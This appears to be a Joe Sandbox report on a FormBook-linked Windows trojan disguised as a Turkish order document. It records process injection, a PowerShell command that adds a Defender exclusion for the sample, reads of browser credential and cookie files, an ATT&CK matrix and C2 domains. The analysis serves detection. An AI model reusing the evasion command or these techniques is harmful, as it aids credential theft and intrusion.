            Source: C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exe NtReadFile: Direct from: 0x77542ADC
            Source: C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exe NtQuerySystemInformation: Direct from: 0x77542DFC
            Source: C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exe NtResumeThread: Direct from: 0x775436AC
            Source: C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exe NtNotifyChangeKey: Direct from: 0x77543C2C
            Source: C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exe NtCreateMutant: Direct from: 0x775435CC
            Source: C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exe NtWriteVirtualMemory: Direct from: 0x77542E3C
            Source: C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exe NtMapViewOfSection: Direct from: 0x77542D1C
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe Memory written: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe Section loaded: NULL target: C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe Section loaded: NULL target: C:\Windows\SysWOW64\shutdown.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\shutdown.exe Section loaded: NULL target: C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exe protection: read write
            Source: C:\Windows\SysWOW64\shutdown.exe Section loaded: NULL target: C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\shutdown.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\shutdown.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\shutdown.exe Thread register set: target process: 1544
            Source: C:\Windows\SysWOW64\shutdown.exe Thread APC queued: target process: C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exe
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe"
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe Process created: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe "C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe"
            Source: C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exe Process created: C:\Windows\SysWOW64\shutdown.exe "C:\Windows\SysWOW64\shutdown.exe"
            Source: C:\Windows\SysWOW64\shutdown.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: zkhJmzWnNnFLoIoaAsyqpwQZ.exe, 0000000C.00000002.2562495871.00000000018E1000.00000002.00000001.00040000.00000000.sdmp, zkhJmzWnNnFLoIoaAsyqpwQZ.exe, 0000000C.00000000.2140831880.00000000018E1000.00000002.00000001.00040000.00000000.sdmp, zkhJmzWnNnFLoIoaAsyqpwQZ.exe, 0000000E.00000000.2279922196.0000000001431000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager
            Source: zkhJmzWnNnFLoIoaAsyqpwQZ.exe, 0000000C.00000002.2562495871.00000000018E1000.00000002.00000001.00040000.00000000.sdmp, zkhJmzWnNnFLoIoaAsyqpwQZ.exe, 0000000C.00000000.2140831880.00000000018E1000.00000002.00000001.00040000.00000000.sdmp, zkhJmzWnNnFLoIoaAsyqpwQZ.exe, 0000000E.00000000.2279922196.0000000001431000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
            Source: zkhJmzWnNnFLoIoaAsyqpwQZ.exe, 0000000C.00000002.2562495871.00000000018E1000.00000002.00000001.00040000.00000000.sdmp, zkhJmzWnNnFLoIoaAsyqpwQZ.exe, 0000000C.00000000.2140831880.00000000018E1000.00000002.00000001.00040000.00000000.sdmp, zkhJmzWnNnFLoIoaAsyqpwQZ.exe, 0000000E.00000000.2279922196.0000000001431000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
            Source: zkhJmzWnNnFLoIoaAsyqpwQZ.exe, 0000000C.00000002.2562495871.00000000018E1000.00000002.00000001.00040000.00000000.sdmp, zkhJmzWnNnFLoIoaAsyqpwQZ.exe, 0000000C.00000000.2140831880.00000000018E1000.00000002.00000001.00040000.00000000.sdmp, zkhJmzWnNnFLoIoaAsyqpwQZ.exe, 0000000E.00000000.2279922196.0000000001431000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe Queries volume information: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe VolumeInformation
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            Source: Yara match File source: 5.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 5.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 0000000D.00000002.2563757906.0000000003700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 0000000D.00000002.2561298319.0000000003230000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 0000000E.00000002.2563222127.0000000000FA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000005.00000002.2213669414.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000005.00000002.2214051577.0000000001250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 0000000D.00000002.2563650828.00000000036C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000005.00000002.2215409822.0000000001AF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 0000000C.00000002.2563123525.0000000002F70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\shutdown.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\shutdown.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\shutdown.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\shutdown.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\shutdown.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\shutdown.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\shutdown.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\shutdown.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\shutdown.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

            Remote Access Functionality

            Source: Yara match File source: 5.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 5.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 0000000D.00000002.2563757906.0000000003700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 0000000D.00000002.2561298319.0000000003230000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 0000000E.00000002.2563222127.0000000000FA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000005.00000002.2213669414.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000005.00000002.2214051577.0000000001250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 0000000D.00000002.2563650828.00000000036C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000005.00000002.2215409822.0000000001AF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 0000000C.00000002.2563123525.0000000002F70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
            Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
            DLL Side-Loading
            412
            Process Injection
            1
            Masquerading
            1
            OS Credential Dumping
            121
            Security Software Discovery
            Remote Services1
            Email Collection
            1
            Encrypted Channel
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            Abuse Elevation Control Mechanism
            11
            Disable or Modify Tools
            LSASS Memory2
            Process Discovery
            Remote Desktop Protocol1
            Archive Collected Data
            3
            Ingress Tool Transfer
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading
            41
            Virtualization/Sandbox Evasion
            Security Account Manager41
            Virtualization/Sandbox Evasion
            SMB/Windows Admin Shares1
            Data from Local System
            3
            Non-Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook412
            Process Injection
            NTDS1
            Application Window Discovery
            Distributed Component Object ModelInput Capture3
            Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information
            LSA Secrets2
            File and Directory Discovery
            SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Abuse Elevation Control Mechanism
            Cached Domain Credentials113
            System Information Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
            Obfuscated Files or Information
            DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
            Software Packing
            Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
            Timestomp
            /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
            DLL Side-Loading
            Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
            Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
            File Deletion
            Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
            Behavior Graph ID: 1467080, Sample: 03.07.2024-sipari#U015f UG0..., Startdate: 03/07/2024, Architecture: WINDOWS, Score: 100

            Source | Detection | Scanner | Label | Link
            03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe | 29% | ReversingLabs | ByteCode-MSIL.Trojan.Nekark
            03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe | 100% | Joe Sandbox ML
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            Source | Detection | Scanner | Label | Link
            https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe
            https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | Avira URL Cloud | safe
            https://duckduckgo.com/ac/?q= | 0% | Avira URL Cloud | safe
            https://duckduckgo.com/chrome_newtab | 0% | Avira URL Cloud | safe
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico | 0% | Avira URL Cloud | safe
            http://www.fungusbus.com/ucdm/?j2=EKdombQUikql/e8x5w/b0WRCZZ7GjewvGt5yqJ62oMuwgaHfKWbffkwAJSwjzlHKlyNbdgTciiNebF1Tnxx1ssE7dAszzRsyY0LYOFUjrmAhIYA2gw==&NbL=5XSdkb2PqtnPh8PP | 0% | Avira URL Cloud | safe
            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            parkingpage.namecheap.com | 91.195.240.19 | true | true | | unknown
            www.fungusbus.com | unknown | unknown | true | | unknown
            www.deviexp.com | unknown | unknown | true | | unknown
            www.betful.site | unknown | unknown | true | | unknown
                    Name | Malicious | Antivirus Detection | Reputation
                    http://www.fungusbus.com/ucdm/?j2=EKdombQUikql/e8x5w/b0WRCZZ7GjewvGt5yqJ62oMuwgaHfKWbffkwAJSwjzlHKlyNbdgTciiNebF1Tnxx1ssE7dAszzRsyY0LYOFUjrmAhIYA2gw==&NbL=5XSdkb2PqtnPh8PP | true | Avira URL Cloud: safe | unknown
                    Name | Source | Malicious | Antivirus Detection | Reputation
                    https://ac.ecosia.org/autocomplete?q= | shutdown.exe, 0000000D.00000003.2493335987.0000000008318000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                    https://duckduckgo.com/chrome_newtab | shutdown.exe, 0000000D.00000003.2493335987.0000000008318000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | shutdown.exe, 0000000D.00000003.2493335987.0000000008318000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | shutdown.exe, 0000000D.00000003.2493335987.0000000008318000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                    https://duckduckgo.com/ac/?q= | shutdown.exe, 0000000D.00000003.2493335987.0000000008318000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                    https://www.google.com/images/branding/product/ico/googleg_lodp.ico | shutdown.exe, 0000000D.00000003.2493335987.0000000008318000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                    https://www.ecosia.org/newtab/ | shutdown.exe, 0000000D.00000003.2493335987.0000000008318000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe, 00000000.00000002.1329890365.0000000002F50000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | shutdown.exe, 0000000D.00000003.2493335987.0000000008318000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | shutdown.exe, 0000000D.00000003.2493335987.0000000008318000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                    IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                    91.195.240.19 | parkingpage.namecheap.com | Germany | | 47846 | SEDO-ASDE | true
                    Joe Sandbox version:40.0.0 Tourmaline
                    Analysis ID:1467080
                    Start date and time:2024-07-03 17:50:06 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 8m 43s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:15
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:2
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe
                    renamed because original name is a hash value
                    Original Sample Name:03.07.2024-sipari UG01072410 -onka ve Tic a.s.exe
                    Detection:MAL
                    Classification:mal100.rans.troj.spyw.evad.winEXE@10/7@3/1
                    EGA Information:
                    • Successful, ratio: 75%
                    HCA Information:
                    • Successful, ratio: 95%
                    • Number of executed functions: 194
                    • Number of non-executed functions: 312
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                    • Execution Graph export aborted for target zkhJmzWnNnFLoIoaAsyqpwQZ.exe, PID 2000 because it is empty
                    • Not all processes where analyzed, report is missing behavior information
                    • Report creation exceeded maximum time and may have missing disassembly code information.
                    • Report size getting too big, too many NtCreateKey calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • VT rate limit hit for: 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe
                    Time | Type | Description
                    11:50:54 | API Interceptor | 1x Sleep call for process: 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe modified
                    11:50:56 | API Interceptor | 16x Sleep call for process: powershell.exe modified
                    Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                    91.195.240.19 | Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe | Get hash | malicious | FormBook | Browse | www.fungusbus.com/dmjt/
                    91.195.240.19 | Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe | Get hash | malicious | FormBook | Browse | www.fungusbus.com/dmjt/
                    91.195.240.19 | Att00173994.exe | Get hash | malicious | FormBook | Browse | www.fitfindrr.com/838k/
                    91.195.240.19 | disjR92Xrrnc3aZ.exe | Get hash | malicious | FormBook | Browse | www.mantenopolice.com/mc10/?FPWhWLW=a7Q9lfqDygppgo6ZV30aZxePdataSOImfCiDXzHht2L4ahHGK8erugmBdeKHLdVYRCp3nMCDZQ==&AlB=8pdT8tsp
                    91.195.240.19 | Attendance list.exe | Get hash | malicious | FormBook | Browse | www.gipsytroya.com/tf44/
                    91.195.240.19 | Att0027592.exe | Get hash | malicious | FormBook | Browse | www.fitfindrr.com/838k/
                    91.195.240.19 | 1R50C5E13BU8I.exe | Get hash | malicious | FormBook | Browse | www.banyan.love/u44f/
                    91.195.240.19 | Fiyat ARH-4532817-PO 45328174563.exe | Get hash | malicious | FormBook | Browse | www.fungusbus.com/dmjt/
                    91.195.240.19 | Fiyat ARH-4532817-PO 45328174563.exe | Get hash | malicious | FormBook | Browse | www.fungusbus.com/dmjt/
                    91.195.240.19 | KALIANDRA SETYATAMA PO 1310098007.exe | Get hash | malicious | FormBook | Browse | www.fungusbus.com/dmjt/
                    Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                    parkingpage.namecheap.com | Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe | Get hash | malicious | FormBook | Browse | 91.195.240.19
                    parkingpage.namecheap.com | Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe | Get hash | malicious | FormBook | Browse | 91.195.240.19
                    parkingpage.namecheap.com | Att00173994.exe | Get hash | malicious | FormBook | Browse | 91.195.240.19
                    parkingpage.namecheap.com | disjR92Xrrnc3aZ.exe | Get hash | malicious | FormBook | Browse | 91.195.240.19
                    parkingpage.namecheap.com | Attendance list.exe | Get hash | malicious | FormBook | Browse | 91.195.240.19
                    parkingpage.namecheap.com | Att0027592.exe | Get hash | malicious | FormBook | Browse | 91.195.240.19
                    parkingpage.namecheap.com | #U0130#U015eLEM #U00d6ZET#U0130_524057699-1034 nolu TICAR_pdf (2).exe | Get hash | malicious | FormBook | Browse | 91.195.240.19
